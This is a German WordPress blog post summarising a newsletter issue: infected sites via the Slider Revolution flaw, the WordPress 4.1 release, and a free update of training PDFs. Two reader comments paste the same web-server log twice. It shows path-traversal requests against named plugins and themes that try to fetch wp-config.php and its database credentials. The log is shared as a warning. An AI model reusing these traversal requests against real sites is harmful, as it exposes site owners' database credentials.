WordPress & Webwork

WordPress-Newsletter Nr. 166

WordPress-NL 166: zahlreiche WP-Websites wurden infiziert, WP 4.1 noch diese Woche, kostenloses Update der WordPress-Schulungsunterlagen

WordPress-Newsletter Ich habe Deinstag Nachmittag die 166. Ausgabe des WordPress-Newsletters an die Abonnenten verschickt. Das waren vor vier Tagen die Themen:

Tausende von infizierten WordPress-Installationen: Über die Sicherheitslücke im Plugin Slider-Revolution habe ich hier im Newsletter bereits berichtet. Nun sieht es wohl so aus, dass viele Tausend Websites infiziert wurden. Das ist ein Problem, wenn man Themes und Plugins bündelt. Ob die eigene Website betroffen ist kann man u.a. hier prüfen.

WordPress 4.1 noch diese Woche: Vor wenigen Tagen wurde der erste Release Candidate von WordPress 4.1 veröffentlicht. In den nächsten Stunden soll RC2 veröffentlicht werden und wenn nichts schief läuft, dann wird die finale Version in den kommenden Tagen veröffentlicht. Einige der Neuerungen in WP 4.1 werden hier erwähnt. Nachtrag: mittlerweile wurde WordPress 4.1 veröffentlicht. Große Neuerungen sind das neue Standard-Theme, ablenkungsfreie Schreiben im Editor und das Einbetten von Vine-Viedeos.

Vorteile eines Benutzeraccounts auf WordPress.org: In diesem langen, deutschsprachigen Artikel erfährt man was man alles mit einem Benutzeraccount auf wordpress.org ereeichen kann und worin der Nutzen liegt.

Besteller von Lizenzen von den WordPress-Schulungsunterlagen bekommen kostenlose Aktualisierung: Ein Hinweis in eigener Sache: da es nicht mehr lange dauern wird, bis WordPress 4.1 veröffentlicht wird bekommen alle Besteller von der WordPress-Anleitung und -Handbuch (PDF-Volumenlizenzen) eine zusätzliche, kostenlose Aktualisierung der Unterlagen.

Wer also PDF-Unterlagen ohne Update bestellt, bekommt trotzdem ein Update der Unterlagen auf WordPress 4.1 und wer Unterlagen mit der Update-Option bestellt bekommt dann zwei Aktualisierungen.

Das ganze ist begrenzt bis zu dem Zeitpunkt, wo wir die Unterlagen auf WP 4.1 aktualisiert haben und es dient dazu, dass die Käufer, die jetzt noch die Unterlagen erwerben nicht benachteiligt werden.

Ich wünsche allen Lesern von perun.net und des Newsletters ein frohes Weihnachtsfest und ein gutes, fröhliches, erfolgreiches und gesundes Jahr 2015.

Den nächsten Newsletter gibt es (voraussichtlich) am Dienstag, den 06. Januar 2015.

4 Reaktion(en)

  1. Jowi

    WordPress under Attack!

    Auch meine WordPress-Installationen wurden auf Plugin-Schwachstellen von einem russischen Server aus (109.184.9.95) auf Schwachstellen in Plugins und Themes geprüft. Hier die Abschnitte aus der Log-Datei, die aufzeigt, welche Plugins und Themes sich offensichtlich missbrauchen lassen, um die wp-config.php-Datei herunter zu laden, was natürlich wegen dem dort unverschlüsselt hinterlegten Datenbankzugang fatal ist.

    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/parallelus-mingle/framework/utilities/downloa
    d/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleW
    ebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image
    .php?href=../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30
    (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=
    ../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML,
    like Gecko) Chrome/10.0.648.134 Safari/534.16"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../w
    p-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, lik
    e Gecko) Chrome/19.0.1055.1 Safari/535.24"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/parallelus-salutation/framework/utilities/dow
    nload/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 6.0) AppleW
    ebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/tess/download.php?file=../../../wp-config.php
    HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.704.0 Saf
    ari/534.25"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&
    filename=wp-config.php&action=download HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (
    KHTML, like Gecko) Chrome/14.0.824.0 Safari/535.1"

  2. Jowi

    So sieht eine Attacke im Logfile aus.

    Von 109.184.9.95 (Russische IP) wurde der von mir betreute Server auf Schwachstellen in Plugins abgeklopft.

    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/parallelus-mingle/framework/utilities/downloa
    d/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; FreeBSD amd64) AppleW
    ebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.65 Safari/535.11"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image
    .php?href=../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 6.1; en-US) AppleWebKit/534.30
    (KHTML, like Gecko) Chrome/12.0.750.0 Safari/534.30"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=
    ../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML,
    like Gecko) Chrome/10.0.648.134 Safari/534.16"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../w
    p-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.24 (KHTML, lik
    e Gecko) Chrome/19.0.1055.1 Safari/535.24"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/parallelus-salutation/framework/utilities/dow
    nload/getfile.php?file=../../../../../../wp-config.php HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 6.0) AppleW
    ebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.1 Safari/535.1"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/themes/tess/download.php?file=../../../wp-config.php
    HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.704.0 Saf
    ari/534.25"
    109.184.9.95 - - [04/Jan/2015:07:31:24 +0100] "GET /wp-content/plugins/wp-filemanager/incl/libfile.php?path=../../&
    filename=wp-config.php&action=download HTTP/1.1" 404 40111 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (
    KHTML, like Gecko) Chrome/14.0.824.0 Safari/535.1"

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.